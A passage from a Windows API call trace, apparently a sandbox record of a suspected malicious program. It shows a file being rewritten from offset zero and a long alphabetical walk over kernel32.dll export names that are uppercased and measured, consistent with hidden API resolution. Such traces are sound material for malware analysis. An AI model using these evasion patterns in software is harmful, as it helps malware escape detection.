pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.677] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.678] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.678] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.678] CloseHandle (hObject=0x43c) returned 1 [0084.679] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.679] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.679] CloseHandle (hObject=0x0) returned 0 [0084.679] CloseHandle (hObject=0x438) returned 1 [0084.680] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.680] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.680] GetTickCount () returned 0x114da1a [0084.680] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.680] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.680] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.681] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.681] lstrlenA (lpString="kernel32.dll") returned 12 [0084.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.681] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.681] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.681] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.681] lstrlenA (lpString="ADDATOMA") returned 8 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.681] lstrlenA (lpString="ADDATOMW") returned 8 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.681] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.681] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.681] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.682] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.682] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.682] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.682] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.682] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.682] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.682] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.682] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.682] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.682] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.682] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.682] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.682] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.682] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.682] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.682] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.682] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.683] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.683] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.683] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.683] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.683] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.683] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.683] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.683] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.683] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.683] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.683] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.683] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.683] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.683] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.683] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.683] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.683] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.684] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.684] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.684] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.684] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.684] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.684] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.684] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.684] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.684] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.684] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.684] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.684] lstrlenA (lpString="BEEP") returned 4 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.684] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.684] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.684] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.684] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.684] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.684] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.684] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.685] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.685] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.685] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.685] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.685] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.685] lstrlenA (lpString="CANCELIO") returned 8 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.685] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.685] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.685] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.685] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.685] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.685] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.685] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.685] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.685] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.685] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.685] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.685] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.685] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.686] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.686] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.686] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.686] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.686] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.686] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.686] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.686] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.686] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.686] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.686] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.686] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.686] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.686] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.687] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.687] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.687] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.687] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.687] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.687] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.687] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.687] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.687] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.687] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.687] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.687] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.687] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.687] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.687] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.687] lstrlenA (lpString="COPYFILEA") returned 9 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") 